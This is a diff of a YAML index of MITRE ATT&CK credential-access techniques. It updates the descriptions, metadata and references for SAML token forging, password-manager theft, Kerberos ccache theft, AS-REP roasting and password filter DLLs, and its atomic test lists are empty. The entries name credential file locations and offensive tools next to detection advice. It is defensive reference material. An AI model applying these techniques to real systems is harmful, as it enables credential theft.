+        url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+      - source_name: ired Dumping LSA Secrets
+        description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+          Retrieved February 21, 2020.
+        url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+      - source_name: Microsoft AD Admin Tier Model
+        description: Microsoft. (2019, February 14). Active Directory administrative
+          tier model. Retrieved February 21, 2020.
+        url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+      - source_name: Passcape LSA Secrets
+        description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+          2020.
+        url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+      - source_name: Powersploit
+        description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+        url: https://github.com/mattifestation/PowerSploit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.004
     atomic_tests: []
   T1606.002:
     technique:
-      modified: '2024-03-01T17:55:56.116Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Forge Web Credentials: SAML token'
       description: |-
         An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
 
         An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
 
-        An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+        An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Blake Strom, Microsoft 365 Defender
       - Oleg Kolesnikov, Securonix
@@ -44466,14 +45117,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
       - SaaS
       - Windows
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       - 'Web Credential: Web Credential Creation'
@@ -44514,14 +45165,11 @@ credential-access:
         url: https://www.sygnia.co/golden-saml-advisory
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1606.002
     atomic_tests: []
   T1003.007:
     technique:
-      modified: '2024-04-10T16:41:01.496Z'
+      modified: '2024-10-15T15:13:32.253Z'
       name: 'OS Credential Dumping: Proc Filesystem'
       description: |-
         Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -44584,81 +45232,79 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.007
     atomic_tests: []
   T1555.005:
     technique:
+      modified: '2024-08-19T13:53:33.661Z'
+      name: Password Managers
+      description: |-
+        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_contributors:
+      - Matt Burrough, @mattburrough, Microsoft
+      x_mitre_deprecated: false
+      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+        for suspicious activity that could indicate searching in process memory of
+        password managers. \n\nConsider monitoring file reads surrounding known password
+        manager applications."
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Matt Burrough, @mattburrough, Microsoft
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      - 'Process: OS API Execution'
+      - 'File: File Access'
+      - 'Command: Command Execution'
       type: attack-pattern
+      id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
       created: '2021-01-22T16:08:40.629Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1555.005
         url: https://attack.mitre.org/techniques/T1555/005
-      - source_name: ise Password Manager February 2019
-        url: https://www.ise.io/casestudies/password-manager-hacking/
-        description: 'ise. (2019, February 19). Password Managers: Under the Hood
-          of Secrets Management. Retrieved January 22, 2021.'
+        external_id: T1555.005
+      - source_name: Cyberreason Anchor December 2019
+        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+          10, 2020.'
+        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
       - source_name: FoxIT Wocao December 2019
-        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
         description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
           Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
           October 8, 2020.'
+        url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+      - source_name: ise Password Manager February 2019
+        description: 'ise. (2019, February 19). Password Managers: Under the Hood
+          of Secrets Management. Retrieved January 22, 2021.'
+        url: https://www.ise.io/casestudies/password-manager-hacking/
       - source_name: Github KeeThief
-        url: https://github.com/GhostPack/KeeThief
         description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
           2021.
+        url: https://github.com/GhostPack/KeeThief
       - source_name: NVD CVE-2019-3610
-        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
         description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
           Detail. Retrieved April 14, 2021.
-      - source_name: Cyberreason Anchor December 2019
-        url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
-        description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
-          A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
-          10, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Password Managers
-      description: |-
-        Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
-        Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
-         Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: credential-access
-      x_mitre_detection: "Consider monitoring API calls, file read events, and processes
-        for suspicious activity that could indicate searching in process memory of
-        password managers. \n\nConsider monitoring file reads surrounding known password
-        manager applications."
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      - 'Process: OS API Execution'
-      - 'File: File Access'
-      - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1040:
     technique:
-      modified: '2024-04-19T12:32:44.370Z'
+      modified: '2024-10-15T15:11:55.217Z'
       name: Network Sniffing
       description: |-
         Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -44743,12 +45389,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1040
     atomic_tests: []
   T1552.002:
     technique:
-      modified: '2023-07-28T18:29:56.525Z'
+      modified: '2024-10-15T16:26:46.873Z'
       name: 'Unsecured Credentials: Credentials in Registry'
       description: |-
         Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -44797,38 +45442,13 @@ credential-access:
         url: https://pentestlab.blog/2017/04/19/stored-credentials/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.002
     atomic_tests: []
   T1556.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -44852,76 +45472,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -44956,6 +45629,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -44963,32 +45643,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -45024,7 +45740,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -45049,13 +45765,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
